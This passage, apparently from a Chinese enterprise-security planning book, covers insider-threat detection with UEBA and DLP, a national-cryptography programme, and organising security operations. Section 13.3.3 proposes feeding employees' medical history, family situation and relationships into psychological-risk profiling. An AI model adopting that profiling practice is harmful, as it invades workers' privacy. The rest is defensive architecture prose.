内部威胁和未知威胁是最难捕获的,也是传统安全工具无法检测的,并且可能是最具破坏性的。UEBA作为新型安全技术,用于帮助安全团队识别、响应可能被忽视的内部威胁。它采用业界先进的技术(如机器学习),用于识别、跟踪恶意用户在遍历企业环境时的行为,并通过一系列机器学习算法检测偏离用户规范的操作。 2.数据泄露防护(DLP)技术 DLP技术能够通过对数据进行内容识别,对传输、存储、使用中的数据进行检测,依据预先定义的策略来实施特定响应。内容识别能力是数据识别的关键,DLP的核心能力就是通过内容识别精确识别敏感数据。内容识别的技术包括关键字、正则表达式、文档指纹、确切数据源(数据库指纹)、向量机学习等。 DLP系统主要包括管理平台、网络DLP、终端DLP、存储DLP。每个产品可以作为独立的产品进行部署,也可以联合部署。 ● 管理平台:集中管理DLP产品组件;集中制定、下发数据采集、泄露防护策略;集中进行数据安全事件监控、处置、审计和分析。 ● 网络DLP:在网络出口或安全域边界识别、控制传输中的敏感数据,控制或监视通过HTTP/HTTPS、SMTP/SMTPS、FTP等网络协议传送的敏感数据。 ● 终端DLP:发现、识别、监控计算机终端的敏感数据;对敏感数据的违规使用、发送等进行策略控制;对敏感数据的终端使用行为进行监控。 ● 存储DLP:对存储在服务器、数据库、存储库中的结构化数据和非结构化数据进行扫描,根据策略发现、记录敏感数据,并对违规存储事件报警。 13.2.5 预期效果 内部威胁防控体系建成后,能够通过内部威胁感知平台实现用户行为检测、风险用户管理、风险事件管理、异常告警管理、安全事件追溯等功能。 13.3 内部威胁防护体系建设要点 13.3.1 内部威胁防护体系建设的前置条件 在建设内部威胁防护体系之前,需要企业(或组织)已经完成安全项目的基本建设。在安全数据采集中,需要重点采集安全身份的用户信息、权限数据和特权账号数据。采集态势感知平台中存储的DLP日志、数据访问日志、数据加密日志、终端内容日志、终端行为日志、终端DLP日志、网络流量日志、安全设备日志等信息。因此需要提前建设好相关的身份管理与访问控制平台、系统安全平台、态势感知平台、终端安全防护平台、数据安全管理平台。 在采集安全数据的同时,也会采集应用系统的应用管理日志、业务行为日志、IT系统的IT系统日志等信息,也同样需要对接IT运维管理系统。 13.3.2 网络数据泄露防护系统 除上述安全平台建设外,还需要单独建设网络数据泄露防护(DLP)系统,来保护敏感数据并采集其日志。 网络DLP系统基于内容识别、自然语言处理、机器学习、数字指纹、OCR等技术,对常见数据格式和网络协议进行深度解析。它可以有效识别敏感数据,监控敏感数据的使用情况,防止特定的敏感数据或信息资产以违反安全策略规定的形式流出企业。 网络DLP系统可从网络流量中采集数据内容级别的检测日志和数据泄露事件日志,日志数据可作为一种重要数据源汇总至平台用于执行内部威胁分析。 13.3.3 数据采集 在内部威胁防护体系中,数据是最重要的要素之一,是感知内部威胁的前提,是威胁分析的基础,因此建立完善的数据采集方案,获取高质量的日志数据是构建内部威胁防护体系的重要一环。 ● 主体数据 人是内部威胁的主体,内部威胁检测围绕人的行为进行大数据分析,因此需要把人的要素进行系统化的梳理。人的要素中会有个人的属性,如性别、年龄、家庭情况、病史、职位、绩效、考勤和人际关系等,这类数据可作为心理状态评估的原始依据,可从人力系统、考勤系统、办公系统等业务系统中获取。基于海量的数据,可通过统计计算出个体的行为基线,以用于行为风险分析。 ● 行为数据 行为数据是内部威胁的客体,通常是各类信息系统。用户的行为数据可从针对信息系统的各种审计日志中获取。有些数据可以从信息系统直接导入,有些则需要从其他安全系统进行采集或者导入。针对用户行为数据的采集和汇总,可使用网络DLP采集网络敏感数据日志,从身份安全系统导入人员信息、权限数据、特权账号数据,从态势感知平台导入网络日志数据,从数据安全平台导入数据安全相关日志,从终端安全系统导入终端行为和操作日志,从应用系统和IT系统导入应用操作日志和系统日志。 ● 数据集 基于全面的日志导入、采集、处理来构建分析数据集,在整个防护体系中同等重要。分析数据集如果基于组织机构自身的日志数据,通常需要通过安全事件取证处置或涉及机密等要素触发,需要长期的数据积累和专家知识总结。分析数据集也可从外部获取,多为安全研究机构的公开数据集。就这两种方式来说,外部数据集获取便捷,但内部数据集则更适配自身的业务场景。因此,通常可以两者相结合,取长补短,从而及时获得高可用的分析数据集。 13.3.4 内部威胁感知平台 内部威胁感知平台基于终端日志、网络日志、应用日志、数据安全日志、系统日志等数据,形成大数据建模分析能力。再利用机器学习、UEBA等技术,从身份、设备、权限、行为等多个维度分析安全风险,生成告警,及时有效预警内部威胁事件。告警事件可与网络空间态势感知平台同步。 ● 数据处理 在内部威胁感知平台中,数据处理模块负责接收或提取各系统的日志数据。数据经过转换和格式化变成分析引擎的可用数据。系统结合上下文信息和内置模板富化数据。数据最终经过流处理模块和过滤模块进入平台的存储和索引单元。 ● 分析引擎 分析引擎是内部威胁感知平台的核心。内部威胁检测需要与场景相结合,风险场景是某类异常的集合,往往与业务强相关,需要大量的模型积累和专家知识,并通过场景定义和规则/策略的结合,才能形成适用于业务环境的分析模型组合。 平台根据内部威胁的特征,建立场景化的分析模型,有效应对内部欺诈、权限滥用、数据窃取、意外泄露、系统破坏等多种内部威胁类型。系统需要重点关注高权限用户群体,同时针对特权账户、外包人员、普通员工等不同用户、实体类型建立有针对性的风险分析模型。 有了数据和场景的基础,还需要适当的检测分析方法。分析方法是系统提供的异常检测方法、技术、算法或者能力的统称。在新环境下,分析方法越来越丰富,从基础的规则分析到基线分析、关联分析,再到机器学习、人工智能、社区发现等算法和技术,都可以在内部威胁感知平台中得到应用。这些分析方法可以极大地提高风险分析的效率和准确率。 ● 威胁呈现 威胁可视化通过异常人员和威胁事件两个角度进行呈现。异常人员的角度便于监控用户异常访问行为,有利于快速发现异常用户。威胁事件的角度,便于直观快速地获取内部威胁整体态势,评估安全影响,进而进行快速处置。在通过内部威胁感知平台的分析引擎的分析后,可实现用户行为检测、风险用户管理、风险事件管理、异常告警管理、安全事件追溯。 13.3.5 人员管理制度 内部威胁的主体是内部的人,人的管控是内部威胁防护的核心。脱离人这一关键要素的安全防护体系是不完整的,也必定不是一个高效的防护体系。 因此内部威胁防护体系的建设,除完善的技术手段和庞大的经济投入外,还需要建立职责明确的内部威胁安全管理组织,制定完善系统的信息安全管理制度,并在此基础上建立内部人员管理和培训机制。 人员管理制度应包括员工认同、激励机制、心理疏导等,培训内容除安全制度外还应包括风险认知、安全意识、法律意识、价值观文化认同、情绪管理等。通过不断强化的人员管理,减少内部威胁攻击者的潜在动机,从而达到防范内部威胁的目的,也许是一种事半功倍的低成本防护手段。 第14章 密码专项 14.1 数字化转型与业务发展的新要求 14.1.1 新技术新业务发展挑战 密码作为保护网络与信息安全的重要手段,在身份识别、安全隔离、信息加密、完整性保护和抗抵赖等方面发挥着不可替代的重要作用。密码分为核心密码、普通密码和商用密码。在商用密码领域,国产密码产业涉及以基础密码设备为主的硬件产品以及以安全信息系统为主的软件产品,并衍生出相关安全运维服务,广泛应用于金融、政务、通信等领域。我国关键信息基础设施建设和各领域信息化、智能化的业务发展,以及《中华人民共和国网络安全法》《中华人民共和国密码法》的颁布实施,对各领域的密码应用提出了新的挑战。 在金融方面,2013年,中国人民银行发布《中国金融集成电路(IC)卡规范》,首次支持SM算法;2014年,中国银联修订发布《中国银联金融IC卡技术规范》,对SM算法提供了支持。自此,金融IC卡开始试点应用SM算法并逐步规模化应用。近年来,金融领域国密改造以及移动支付、区块链等新应用的出现,对密码应用的有效性、可用性和合规性都提出了新的要求。 在工业与物联网方面,业务应用和数据长期以来并未得到有效的保护。密码技术的应用尽管可以有效地实现身份认证和数据加密,但仍需解决低延时、高可靠、低功耗等需求,针对不同行业和领域的工业及物联网密码应用,需要定制化的解决方案。如在视频监控领域,可通过终端接入管理,加强安全认证,保障视频安全传输,免遭人为破坏。在车联网领域,通过建设证书认证系统、授权管理系统、密钥管理系统,可为智能运输系统提供身份鉴别、授权管理、安全传输、数据保护、责任认定和安全管理等安全服务。在工业互联网领域,密码技术可用于加强平台双方的身份认证,防止数据被篡改,实现安全连接、安全执行和安全存储。 在云密码服务方面,云计算技术和产业的发展,以及业务的服务化转型,对传统的密码技术和产品提出新的挑战。如何实现密码能力的虚拟化、资源化、服务化成为密码发展的重要挑战。云密码服务是一种全新的密码功能交付模式,是云计算技术与身份认证、授权访问、传输加密、存储加密等密码技术的深度融合。密码服务提供商按照云计算技术架构的要求整合密码产品、密码使用策略、密码服务接口和服务流程,将密码系统的设计、部署、运维、管理、计费等组合成一种服务,来解决用户的密码应用需求。用户不再“购买”密码硬件或密码系统等密码产品,而是以“租用”的方式使用云中提供的各种密码功能,因此云密码服务也是一种新的商业模式。 新的挑战带来新的需求,同时也催生新的应用模式。随着网络安全与密码技术的不断演进,基于内生安全的密码与网络安全融合发展逐渐成为新的趋势。 14.1.2 基于内生安全的密码与网络安全融合发展 在国家专项支持和应用需求的有力牵引下,我国密码技术和产品供给能力进一步提升,支持商用密码算法的密码产品已达1390多款,其中安全芯片127款。密码产品的检测能力显著提升,信息系统的密码应用安全性评估试点逐步展开,首批10家密评机构已经由国家密码管理局认定,并稳步开展密码应用安全性评估试点工作。密码标准体系建设逐步健全,已发布68项商用密码行业标准;密码标准国际化实现重要突破,祖冲之算法成为3GPP标准,SM2和SM9算法成为ISO国际标准。长期以来,密码应用作为信息安全的关键技术和产品体系发挥着重要作用,但并未与网络安全实现紧密的结合。 随着网络信息技术的发展,传统网络边界消失,安全问题需要建立内生安全机制来解决。密码与信息系统、数据和业务应用紧密结合,是内生安全的基础和重要支撑,密码法的实施也为密码技术的应用和评估提供了法律依据。 14.2 什么是密码专项框架 14.2.1 基本概念 在内生安全的密码专项框架下,密码应用能够满足网络安全产品线对密码应用的需求,密码体系全面对接身份安全,为终端安全、安全网关、数据安全、云安全提供密码模块,为应用安全提供密码中间件,为安全服务提供密评服务能力,为5G、物联网、区块链、数据安全治理等创新应用提供密码应用支撑能力。 14.2.2 设计思想 密码专项旨在大力推动密码在网络安全领域的应用和融合,使密码技术与信息系统、数据和业务应用紧密结合,为内生安全的网络安全系统提供基础支撑。 在架构方面,密码专项向平台化和服务化方向发展,通过密码基础设施平台、密码应用虚拟中台和密码应用管理平台,形成平台化的密码支撑能力,同时实现应用开发密码支撑和密码应用测评,形成整体的密码平台和服务能力,并与信息系统、业务系统及网络安全体系对接。 在技术方面,密码专项本着基础性、系统性、前瞻性的原则,在完善现有应用的基础上,积极发展创新领域的新型密码应用,以适应当前和未来数字化转型与业务发展的需要,重点解决密码技术与设备高性能、高可用性、合规性和国产化替代问题,实现对新型信息基础设施和业务应用的支撑能力。 在应用方面,密码专项通过对信息基础设施的全面覆盖和与业务应用的聚合,提供全面的身份认证、数据加密、传输安全和完整性保护能力与服务,并与网络安全系统实现全面对接。 14.2.3 整体架构 在内生安全框架下,密码应用向平台化和服务化方向发展,企业应通过实施密码专项建立完整的企业级密码体系,如图14.1所示。 图14.1 内生安全框架下的密码应用 建设密码基础设施平台,形成对密码算法、协议以及软硬件实现的统一部署和对云安全、工业安全、物联网密码模块的统一支撑,并根据身份安全、数据安全、应用安全等领域的需要进行功能开发和性能优化。 建设密码应用虚拟中台,针对企业办公网和生产网,以及虚拟化、轻量级、低延时等新兴应用场景的需求,开展密码应用适配与国产化替代,为数据安全、身份安全提供密码应用接口。 建设应用开发密码支撑服务体系,为应用开发的密码需求、架构设计和开发过程提供开发套件,并为应用测试与运营提供密码服务支撑。 建设密码应用管理平台,统一管理上述平台与体系,针对密钥、证书、签名等关键元素进行全生命周期的结构化管理。 建设密码应用测评服务体系,对接等保和关键基础设施防护,依据密码法和密码应用测评规范,对密码应用的正确性、有效性和合规性开展持续的测评与改进。 14.2.4 关键技术 与内生安全密码应用架构相对应,重点布局硬件设备、软件模块、密码系统、密码应用、密码支撑、密码测评、应用创新等领域,形成密码应用技术体系化布局,如图14.2所示。 图14.2 密码应用技术体系化布局 ● 硬件设备 重点布局具有国密资质的加密机、加密卡、可信密码模块、密码卡等硬件产品,满足密钥管理、高性能加解密、可信接入,以及轻量级密码应用的需要,满足标准化、高性能要求,并与密码系统和软件有良好的适配性。 ● 软件模块 重点布局具有国密资质的软加密、软可信、密码SDK、手机盾等软件产品,满足应用透明加解密、桌面及移动设备和物联网终端软件可信环境、虚拟化及分布式平台环境需要,具备定制开发能力,具备面向密码应用环境的高适应性和灵活性。 ● 密码系统 重点布局具有国密资质的密码认证系统、密钥管理系统、数字证书系统、签名验签系统等基础密码系统,为网络安全产品和系统提供底层密码支撑。 ● 密码应用 重点布局密码技术在身份识别、保密传输、隐私保护、可信认证等领域的应用,与业务相结合,形成统一的网络安全解决方案。 ● 密码支撑 重点促进密码技术与身份管理、信息系统安全、大数据安全、应用开发安全等业务的融合,并以密码技术为核心实现网络安全与信息化和业务的融合,形成以密码为核心的内生安全支撑能力。 ● 密码测评 重点布局密码应用测评工具开发、密评规范制定、密评与等保,以及与关基保护相结合的综合测评类,实现密码应用测评能力,并对接密码产品测评。 ● 应用创新 重点布局密码技术在云密码应用、物联网与5G、区块链、数据流通等领域的创新应用,并与上述领域的创新网络安全技术相结合,依托密码应用在网络安全创新应用中取得突破。 14.2.5 预期效果 1.建立基于密码技术的统一身份认证机制 建立以SM2算法PKI系统为基础的统一认证体系,为企业用户、业务应用和设备提供数字证书的生命周期管理、强身份认证和安全可控访问,并以此为基础为信息网提供完整的数字证书服务、综合认证服务、安全审计服务和集中管理监控服务。 统一身份认证体系的构建,将作为企业信息化网络基础认证设施,不仅可为应用系统提供集中强身份管理认证,还能够为其他需要证书服务的应用和设备(如网络加密模块、SSL VPN、网络密码机等)提供数字证书的生命周期管理,并可依托模块化认证架构,为身份安全及应用安全,以及5G、工业、物联网等领域的应用奠定基础。 2.建立面向大数据的数据存储加密机制 数据是驱动网络安全的核心要素,对数据的分析是确保网络安全的主要方法。但随着云计算的普及和业务系统中存储着大量重要和敏感的数据,数据存储的加密成为必选项。因此必须将业务系统中的用户口令、重要数据、重要配置文件、敏感内容等信息进行加密存储,同时采取磁盘加密、分布式加密、文件加密、关键字段加密等灵活的加密方法,并配合高性能的加解密工具,实现数据加密与分析的良好配合。 ● 敏感数据的加密保护 应用系统中存在大量的重要信息,可以直接调用企业统一密码服务管理平台的加解密API,使用主密钥直接加密或解密其中的敏感数据。也可以使用数字信封对数据进行加密保护,将主密钥存放在统一密码服务管理平台中,只部署加密后的数据密钥。仅在需要使用数据密钥时,才调用统一密码服务管理平台获取数据密钥的明文,以在本地加解密业务数据。 ● 口令存储、传输加密保护: 服务器端不允许存储用户的明文口令,客户端一般调用密码服务浏览器插件或App端的SDK,针对口令生成SM3摘要,然后通过安全通道传输到服务器端进行存储。 3.建立对用户透明的数据传输安全通道 用户使用浏览器访问应用的时候涉及重要和敏感数据的传输,这就需要对相应的数据进行保护。可以通过在终端用户的电脑上安装国密算法客户端,该客户端在终端与通道加密服务之间建立安全通道,通道加密服务转发数据到应用,实现用户访问的安全传输。通道加密服务除认证服务端口外,每个应用有一个对外服务端口。在终端完成统一密码服务平台的配置后,用户打开浏览器访问地址即可——访问方式和原来相同,没有任何变化。 4.建立可信的日志完整性保护机制 根据等级保护要求,应用系统的操作日志、审计日志、告警日志等关键日志,需要进行完整性保护。企业可以通过调用统一密码服务平台的服务接口针对日志文件或者相关数据库表生成消息认证码(MAC),同时在验证完整性时对权限列表的消息认证码(MAC)进行验证,以确定完整性是否被破坏。 14.3 建设密码专项框架的方法与要点 14.3.1 建设方法 ● 密码基础设施平台 对现有的密码模块和设备进行梳理和整合,包括支持国密、美密等不同算法,软件、硬件不同形态,加密、认证等不同功能的模块和设备,从而为云安全、工业安全、物联网对特殊密码模块的需求提供统一支撑。 依据网络安全整体规划和身份安全、数据安全、应用安全对密码支撑能力的要求,在统一框架下对密码基础设施平台进行升级改造,在功能和性能上满足企业的发展需要。 ● 密码应用虚拟中台 针对企业信息化业务,包括办公、生产、增值业务和产业生态的密码应用需求,统一开展密码应用中间件的开发、适配和升级改造。 针对云、5G、物联网等新兴应用环境,适配满足虚拟化、移动性、低功耗、低延时等新兴应用环境要求的新型密码机制。 针对身份安全、数据安全领域的密码应用进行适配,实现密码算法的国产化替代,对通信协议的密码应用进行国产化改造。 ● 应用开发密码支撑服务 对接应用安全领域,在应用开发的需求确定、架构管控、编码开发、测试评估等环节,提供密码应用需求分析、架构设计、开发套件和测试工具。 在应用上线运行阶段,为应用运行的监测、维护和远程管理提供必要的密码服务支撑。 ● 密码应用管理平台 建设统一密码应用管理平台,对密码基础设施平台、密码应用虚拟中台、应用开发密码支撑服务体系以及密码应用测评服务体系进行统一管理。 针对密钥、证书、签名、签章等关键元素的全生命周期,包括生成、存储、分发、导入、导出、使用、备份、恢复、归档、销毁等,实现申请、分发、更新、撤销和恢复等管理和服务。 针对密钥、证书等关键元素实施分类、分级的结构化管理,包括对称密钥、非对称密钥,以及有证书和无证书的在线和离线管理,在必要的情况下采取分级管理的方式,建立分布式密钥管理系统。 ● 密码应用测评服务体系 对密码应用的正确性、有效性开展持续评估,确保密码算法、协议、密钥管理、密码产品和服务使用正确、设计合理,在系统运行过程中能够发挥密码效用。 对密码应用的合规性开展持续评估,对接等保和关键基础设施防护要求,符合法律、法规及国标、行标,密码产品和模块通过密码管理部门核准,密码服务通过密码管理部门许可。 依据密码应用测评的结果,对现有密码应用体系进行持续改进和升级。 14.3.2 建设要点 ● 开发关键技术以适配新应用 开发云密码服务、轻量级密码、国产化替代、高性能密码硬件、全业务密码应用等技术,适配以云、大、物、移、智为代表的数字化转型与业务发展的新要求。 ● 建设三个平台和两个体系 建设密码基础设施平台、密码应用虚拟中台、密码应用管理平台三个平台,以及应用开发密码支撑服务体系、密码应用测评服务体系两个体系。 ● 对接网络安全系统 对接身份管理与访问控制平台、多因素认证系统、云平台管理系统、数据安全管理与风险分析平台、终端安全防护平台、云安全管理平台、工业安全态势感知平台等系统。 ● 覆盖信息基础设施 全面覆盖网络(企业办公网、生产网、物联网、工业网、有线网、无线网)、计算环境(固定终端、移动终端、计算服务器、存储服务器、私有云、公有云)、数据(数据存储、数据传输、数据共享、隐私保护)和应用(应用开发、应用测试、应用运行)等信息基础设施。 ● 实现与业务聚合 实现与基础设施(采购、集成、升级)、中间件(开发、适配)、业务应用(开发、测试、运营)、统一管理(流程、可视化)、安全测评(密评与等保结合)等IT业务的聚合。 第15章 实战化安全运行能力建设 15.1 通过安全运行回归安全本质 15.1.1 安全运行在业务发展中面临的挑战 随着信息化和生产力建设的发展,政企机构的业务架构、信息系统架构与技术架构逐渐体系化与完备化。与此同时,信息化资产的体量也愈加庞大,业务变更与互联互通关系也愈加复杂,这给安全运行保障建设提出了若干挑战。 ● 安全运行基础事务繁重 在生产业务中,以人员为主线的身份、凭证、权限管理,是业务逻辑安全运行的基础。在信息化系统中,以资产为主线的资产、配置、漏洞、补丁管理,是信息化资产安全运行的基础。这两类安全运行事务需要投入可观的人力和物力来满足基础的安全保障需求。在对安全产品与工具提出更高可运行要求的同时,也对安全运行团队的工作承载能力提出了挑战。 ● 安全运行技术职责广泛 除基础安全运行事务外,在纵深防御领域,以信息化系统与安全产品的安全策略、访问策略为主线的策略生命周期管理事务,来确保策略与威胁控制、风险控制等需求持续匹配;在积极防御领域,以威胁猎杀、风险评估为主线的安全事件响应处置事务,确保快速发现安全缺陷,并依据标准流程完成处置动作;在威胁情报领域,以情报应用为主线的本地威胁档案化管理事务,持续追踪与归档内部已攻破的高级威胁特征,以及可被攻破的风险特征。彻底完善纵深防御策略、积极防御流程,并为威胁猎杀训练与对抗案例培训提供数据素材,以提升安全对抗水平。 以上在纵深防御、积极防御与威胁情报领域的安全运行保障事务,对安全运行团队的技术职责有各不相同的要求,对安全运行团队的组织建设规划提出了挑战。 ● 安全运行组织建设滞后 业务架构的演变会直接驱动生产业务团队的组织结构进行迭代。管理者着手设计新的生产业务岗位,负责新的业务系统,执行新的业务流程。如果不能及时在组织治理层面与生产业务团队的组织结构层面进行集成,在已有的安全运行事务中,安全运行团队与生产业务团队的职责划分与协同配合会受到影响,最终影响安全保障水平的表现。由于并非由生产业务直接驱动,安全运行团队的组织建设相对滞后,需要及时调整自身的组织编制与规模,来满足生产业务新的安全运行需求。这对安全运行团队的组织建设执行提出了挑战。 ● 安全运行的质量控制迎来新挑战 统一的组织治理是生产业务与安全运行质量控制的基础,细致的安全运行流程与安全操作规程是安全运行质量控制的核心。安全运行流程的细致程度决定了组织间协同配合与信息传递的质量,安全操作规程的细致程度决定了安全运行团队是否能够在特定情况下做出符合预设的安全决策,采取恰当的安全措施,以在预期时间完成安全保障事务。安全运行质量向流程、规程的细致程度提出了挑战。 15.1.2 安全运行与安全运维、运营 “安全运行”并不是当下的热词或新概念。相反,在政企中,不论是生产业务还是安全业务,业务相关的运行体系建设是一系列最基础、最庞杂、最具体的事务的集合。同时,运行体系建设也是实现企业架构愿景最核心、最重要的事务的集合。虽然新的信息系统方案、技术方案是支撑业务发展的关键条件,但是“可运行性”是实现业务发展的必备条件,“运行保障水平”是评价业务成熟度的关键评价体系。 相对于安全运行,安全运维与安全运营是出现更多的两个词汇。安全运维与安全运营均属于安全运行的一部分。安全运维着重于运行体系的流程、规程方案的建设,通过一系列操作步骤与规范、保障预案,实现安全运行过程的质量控制。安全运营着重于运行体系的评价、决策方案的建设,通过运行过程记录、数据采集与指标设计,实现安全运行水平的评价,并促成安全运行决策。 因此,优秀的安全运行保障水平必定需要做好安全运维与安全运营的相关工作,但做好安全运行所需考虑的关键要素并不局限于此。安全运行与生产运行同属于一个概念维度,而生产运行体系的建设归属于企业架构中的业务架构部分,所以为了更好地为企业架构服务,安全运行还需要梳理与企业架构的关系。 15.1.3 安全运行与企业架构 图15.1所示为TOGAF 9.2中定义的企业架构的内容元模型。企业架构的愿景与需求是通过业务架构、信息系统架构与技术架构三个架构体系来支撑的。为了更加稳定、可靠地支撑企业架构的愿景与需求,需要在这三个架构体系上进行安全架构的对等设计。这也是“十大工程、五大任务”中工程建设、体系建设的立足点。 图15.1 TOGAF 9.2中定义的企业架构的内容元模型 “十大工程”中的各个建设内容是以政企信息系统架构、技术架构为基础衍生出安全架构的工程建设解决方案。它通过识别系统架构、技术架构在应用层、逻辑层、物理层的被保护对象,推动安全架构进行对等设计。并通过工程建设的有序推进,完成安全架构与信息系统架构、技术架构的逐步集成,实现工程建设的目标。最终政企的信息系统架构、技术架构作为工程建设的直接受益对象,在工程设计与实现层面更加安全可靠。 而“实战化安全运行能力建设”则是以业务架构为基础衍生出安全架构的组织体系建设解决方案。它通过识别业务架构中支撑“生产运行”的业务驱动力、组织构成和组织行为,并以此为基础推动支撑“安全运行”组织建设的对等设计。通过组织治理层面的集成工作,实现支撑“安全运行”的组织能力建设,实现支撑实战化的安全服务资源,从而整合“十大工程”的建设投入,以及全面服务化工程建设与体系建设的投入,最终把“十大工程、五大任务”相关的安全能力参数承诺转化为实战化的安全保障水平承诺。 15.2 什么是实战化安全运行能力 15.2.1 基本概念 “实战化安全运行能力建设”是以业务架构为基础衍生出安全架构的组织体系建设解决方案。它通过识别业务架构中支撑“生产运行”的业务驱动力、组织构成和组织行为,并以此为基础推动支撑“安全运行”组织建设的对等设计。 15.2.2 设计思想 通过识别企业架构中的业务架构的业务驱动力、组织结构与组织行为(见图15.2),“实战化安全运行能力”分别在这三个层面完成与业务架构的集成。依托于统一的组织治理体系,实现“生产运行”与“安全运行”的同步运行。配合“十大工程”安全建设项目在信息系统架构、技术架构的集成,最终形成实战化的安全架构。 图15.2 TOGAF 9.2中企业架构内容元模型中的业务架构部分 15.2.3 总体架构 “实战化安全运行能力”集成于业务架构中,因此安全运行的业务驱动力、组织结构和组织行为方面的架构设计是必不可少的。图15.3所示为实战化安全运行的整体架构图。 图15.3 实战化安全运行的整体架构 1.业务驱动力层面 在业务驱动力层面,安全运行的实战化体现在如下4个领域。 ● 在“基础架构安全”领域,以人员为主线的身份、凭证、权限管理,和以资产为主线的资产、配置、漏洞、补丁管理是安全运行的基础。这涉及身份/凭证生命周期管理、特权场景管理、特权账号管理、虚拟安全设备生命周期管理、数据分类分级管理、资产管理、漏洞管理、配置管理、补丁管理、日志备份管理、业务关联逻辑调研等工作。 ● 在“纵深防御”领域,以安全策略和访问关系为主线的纵深防御安全策略管理是安全运行的保证。这涉及认证管理、异常行为策略管理、网络访问控制策略管理、终端安全策略管理、安全组策略管理、Web安全管理、行为分析策略管理、代码漏洞管理、代码检测策略管理、访问控制策略管理、特权策略管理、上网行为策略管理、入侵防护安全策略管理、Web应用安全策略管理、数据泄露检测策略管理、威胁检测策略管理、加密策略管理等工作。 ● 在“积极防御”领域,通过以安全事件响应处置为主的威胁监控、威胁猎杀、关联分析、风险评估、策略优化、缓解加固来提升安全防护与风险控制水平。这涉及数据安全监控、风险管理、违规事件管理、安全分析策略管理、安全事件管理、攻击模拟、威胁猎杀、渗透等工作。 ● 在“威胁情报”领域,通过以情报数据应用为主的本地威胁特征采集、可攻破风险情报采集、本地情报档案化、对抗案例培训、威胁猎杀训练来提升威胁对抗水平。 2.组织结构层面 在组织结构层面,需要定义安全运行团队的组织结构和角色职责,并体现出组织单元、角色单元在能力上的具体表现与需求。由于安全运行集成于业务架构,所以“生产运行”业务中定义的角色职责,同样会参与到“安全运行”组织结构中,形成“安全运行虚拟工作组”。合理的组织结构设计,能够在覆盖并安全保障各个分管领域的同时,使“生产运行”与“安全运行”业务团队高效配合,有效支撑“安全运行”在业务驱动力层面定义的四个领域的实战化要点。 3.组织行为层面 在组织行为层面,需要定义出安全团队所遵循的安全运行流程和安全操作规程(图15.3中模拟了研判、分发、修复等环节的流程),使流程中每个环节有清晰的工作内容和工作步骤的定义,并在“安全运行虚拟工作组”中有明确的职责划分。合理的组织行为设计,有清晰的安全运行服务目录以及服务水平承诺,在安全运行流程上能体现出清晰的信息传递与价值传递的过程,形成流程闭环以实现安全保障目标,在安全操作规程上有清晰的操作步骤描述与机械化决策方法,形成安全运行预案,提升安全运行质量的控制水平。 15.2.4 预期成效 安全运行在业务架构中的集成实现能够促成“十大工程”建设成果的服务化,把“十大工程”建设的安全能力参数承诺转化为具体的安全保障水平,最终达成实战化的效果。 15.3 实战化安全运行能力建设要点 15.3.1 安全运行能力建设的内容元模型 “实战化安全运行能力建设”属于组织体系建设的内容,需要与业务架构在组织治理层面进行集成,同时与“十大工程”集成后的信息系统架构、技术架构配合,最终为企业架构的愿景、目标服务。因此在清楚了解“实战化安全运行”所服务的“终端客户”后,实战化安全运行能力建设的首个要点是需要采用企业架构的运行视图,识别实战化安全运行的建设要点。 图15.4所示为TOGAF 9.2中定义的运行视角下的企业架构的内容元模型。在运行视角下,政企机构对外提供的各类业务和服务均是由组织治理过程来支撑的。有若干对象参与了企业架构的运行过程,这些对象在“实战化安全运行”的总体架构中也有不同程度的体现,与“业务架构”也十分契合。 为了便于建设要点的理解,我们对参与企业架构运行的对象进行进一步抽象。实体中的“角色”和“职责”可以抽象为在协同管理方面的建设要点。“技能”和“流程”可以抽象为在技术工作方面的建设要点。“业务能力”“信息流(价值流)”“操作规程”可以抽象为在保障方案方面的建设要点。“协同管理”“技术工作”和“保障方案”是实战化企业架构运行的建设要点,这同样也是实战化生产运行、实战化安全运行的建设要点。 图15.4 TOGAF 9.2中定义的运行视角下的企业架构的内容元模型 以此为基础,再结合安全运行业务驱动力在 “基础架构安全”“纵深防御”“积极防御”“威胁情报”四个安全运行保障领域的定义,可以更加详细地解读实战化安全运行能力的建设要点。 15.3.2 “基础架构安全”领域建设要点 在“基础架构安全”领域,主要工作在于基础“框架设计”。这包括设计“安全运行虚拟工作组”框架来启动组织治理层面集成实现组织间的协同配合,设计“安全域划分”框架来明确安全运行保障责任归属的划分,设计“设备资产管理”“信息化系统管理”“业务应用管理”“身份与权限管理”“密钥管理”框架来明确它们在生命周期的各个阶段以及是否安全标准和运行原则,设计“供应链管理”框架来明确供应商与外包服务的管理原则。最终落实“安全管理制度”和“安全管理办法”,明确安全运行中各组织的权责,以及基础架构层面的运行所需的支撑流程。 1.“基础架构安全”领域的“协同管理”要点 “基础架构安全”领域中的“协同管理”建设要点,需要关注“安全运行虚拟工作组”的框架设计与需求澄清,并得到决策者的支持,从而推动组织治理层面更好地集成与配合。“安全运行虚拟工作组”通常由领导小组、专家小组,以及执行小组三部分组成。领导小组由信息化安全总负责人,以及各生产业务线的负责人构成。他们负责监督各小组职责的履行情况,协调冲突,并负责与外部监管部门保持沟通。专家小组由信息安全主管、各生产业务线主管、分析监控专家,以及安全运维专家组成。他们负责制定安全运行相关的计划与方案,监督安全运行工作的执行,对安全事件进行解决方案与优先级的研判,并向领导小组汇报安全运行工作进展与计划,指导分析监控小组与安全运维小组开展工作。执行小组包括分析监控小组和安全运维小组,分析监控小组由安全分析工程师,以及生产业务线IT接口人组成,负责对突发性安全事件进行关联分析,进行威胁核实,追踪威胁来源,评估业务影响范围,罗列威胁缓解与解决方案,然后上报综合专家小组。安全运维小组由安全运维工程师以及生产业务线IT接口人组成,负责生产系统与安全系统的日常维护与生命周期管理,执行与控制安全变更。由于信息安全主管可能有多人并分管不同的领域,因此相对独立的分管领域和分支机构可以建立平行小组。 2.“基础架构安全”领域的“技术工作”要点 